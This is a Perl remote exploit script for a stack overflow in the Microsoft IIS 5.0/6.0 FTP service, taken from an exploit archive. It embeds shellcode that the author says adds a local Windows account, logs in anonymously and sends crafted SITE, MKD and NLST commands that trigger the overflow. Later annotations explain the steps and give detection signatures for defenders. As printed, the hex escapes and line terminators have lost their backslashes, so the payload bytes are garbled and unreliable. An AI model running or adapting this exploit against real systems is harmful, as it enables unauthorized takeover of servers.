
# Title : Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
# Published : 2009-08-31
# Author : kcope
# Previous Title : Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)
# Next Title : ProFTP 2.9 (welcome message) Remote Buffer Overflow Exploit (meta)


# IIS 5.0 FTPd / Remote r00t exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# August 2009 - KEEP THIS 0DAY PRIV8 
use IO::Socket; 
$|=1;   # unbuffered STDOUT so each FTP server reply printed below appears immediately 
#metasploit shellcode, adduser "winown:nwoniw" 
# $sc is the payload later embedded in the SITE commands (see $v).  The author's comment
# states it is Metasploit-generated and adds a local account with the quoted credentials;
# nothing on this page lets that be verified from the bytes, so treat it as the author's
# claim.  For host-side review, the creation of such an account on a Windows FTP host
# would be the artifact to look for.  The length of $sc is used further down to pad $v
# to exactly 500 bytes.
# NOTE(review): as printed on this page the hex escapes have lost their backslashes
# ("x89xe2" rather than a byte escape), so the literals shown here are plain ASCII text and
# do not encode the bytes the comments describe; the same applies to the "rn" terminators
# used in the protocol strings below.
$sc = "x89xe2xdaxdexd9x72xf4x5bx53x59x49x49x49x49" . 
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" . 
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" . 
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" . 
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x43x30" . 
"x43x30x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55" . 
"x42x58x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4b" . 
"x51x4fx51x30x43x31x4ax4bx47x39x4cx4bx47x44" . 
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" . 
"x4cx44x49x50x44x34x43x37x49x51x49x5ax44x4d" . 
"x43x31x49x52x4ax4bx4cx34x47x4bx51x44x46x44" . 
"x43x34x43x45x4ax45x4cx4bx51x4fx51x34x43x31" . 
"x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" . 
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51" . 
"x4ax4bx4bx39x51x4cx46x44x44x44x48x43x51x4f" . 
"x46x51x4cx36x43x50x50x56x45x34x4cx4bx50x46" . 
"x50x30x4cx4bx47x30x44x4cx4cx4bx42x50x45x4c" . 
"x4ex4dx4cx4bx42x48x45x58x4dx59x4ax58x4cx43" . 
"x49x50x43x5ax46x30x43x58x4cx30x4cx4ax44x44" .
"x51x4fx43x58x4ax38x4bx4ex4dx5ax44x4ex50x57" . 
"x4bx4fx4ax47x42x43x42x4dx45x34x46x4ex42x45" . 
"x44x38x43x55x47x50x46x4fx45x33x47x50x42x4e" . 
"x42x45x43x44x51x30x44x35x44x33x45x35x44x32" . 
"x51x30x43x47x43x59x42x4ex42x4fx43x47x42x4e" . 
"x51x30x42x4ex44x37x42x4fx42x4ex45x39x43x47" . 
"x47x50x46x4fx51x51x50x44x47x34x51x30x46x46" . 
"x51x36x51x30x42x4ex42x45x44x34x51x30x42x4c" . 
"x42x4fx43x53x45x31x42x4cx42x47x43x42x42x4f" . 
"x43x45x42x50x47x50x47x31x42x44x42x4dx45x39" . 
"x42x4ex42x49x42x53x43x44x43x42x45x31x44x34" . 
"x42x4fx43x42x43x43x47x50x42x57x45x39x42x4e" . 
"x42x4fx42x57x42x4ex47x50x46x4fx47x31x51x54" . 
"x51x54x43x30x41x41"; 
#1ca 
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2n"; 
# Requires exactly two positional arguments: the target host and the local address the
# target is told to connect back to (it is reused in the PORT command further down).
# Style: `ne` is the string comparison operator; `!=` is the numeric one this check means,
# though for a small integer index the outcome is the same.
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>n"; 
exit(0); 
} 
srand(time()); 
# Listener port for the child process, chosen in the range 1025..31339
# (int(rand(30315)) + 1025).  It is also spliced into the "w00t$port" directory name and
# into PORT, which is why a random high port shows up in both places in a capture.
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
# Converts the dotted local address into the comma-separated form FTP PORT expects.
# NOTE(review): as printed, the pattern is an unescaped `.`, which matches any character;
# presumably a literal dot was intended (see the note on lost backslashes above).
$locip =~ s/./,/gi; 
# Two processes: the parent (true branch) drives the FTP control session against the
# target; the child (else branch) listens on $port for the connection that the PORT
# command directs the target to open, and echoes whatever arrives.
#
# Defender notes, all visible in the session below:
#  * every step before the trigger runs as the "anonymous" user and needs directory-creation
#    rights (MKD/CWD), so an FTP site that denies anonymous write access never reaches the
#    overflow path exercised here;
#  * on the wire this session is unusual: five consecutive SITE commands with a 500-byte
#    argument, an MKD whose name is several hundred bytes of non-printable data, and an NLST
#    argument containing the wildcard-plus-parent-traversal fragment "*/../C*/" — any of these
#    is a high-confidence signature for the FTP service of IIS 5/6, which is long out of
#    vendor support.
if (fork()) { 
# Control connection to the target's FTP service; the result is not checked, so a refused
# connection surfaces later as a read on an undefined handle.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
# 4-byte filler value repeated throughout the attack buffer; the meaning of the value is
# not explained on the page.
$patch = "x7ExF1xFAx7F"; 
#$retaddr = "ZZZZ"; 
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms 
# SITE argument: 5-byte marker, the payload, then "V" padding so the whole thing is exactly
# 500 bytes (5 + length($sc) + (500 - length($sc) - 5)).
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53" 
   ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0"; 
# attack buffer 
# $c is reused twice: as the bulk of an MKD directory name and as the NLST argument that
# the author marks as the trigger.
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN"; 
# Each exchange below is one command followed by reading and echoing a single reply line;
# multi-line replies are not handled, so the next read may return a continuation line.
$x = <$sock>; 
print $x;                             
print $sock "USER anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymousrn"; 
$x = <$sock>; 
print $x; 
# Creates a working directory named after the random listener port (requires write access).
print $sock "MKD w00t$portrn"; 
$x = <$sock>; 
print $x; 
# The same 500-byte SITE argument is sent five times in a row.
print $sock "SITE $vrn"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>;
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$portrn"; 
$x = <$sock>; 
print $x; 
# Directory name is "CCC" followed by the full attack buffer.
print $sock "MKD CCC". "$crn"; 
$x = <$sock>; 
print $x; 
# Active-mode data connection: the target is told to connect back to $locip on $port
# (high byte, low byte), i.e. to the child process's listener.
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
print $sock "NLST $c*/../C*/rn"; 
$x = <$sock>; 
print $x; 
# Keeps the parent alive while the child listens.  Style: this spins at 100% CPU;
# wait() on the child or sleep would be the conventional form.
while (1) {} 
} else { 
# Child: single-connection listener on all interfaces for the data connection requested
# by PORT; every received line is echoed to STDOUT until the peer closes.
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope
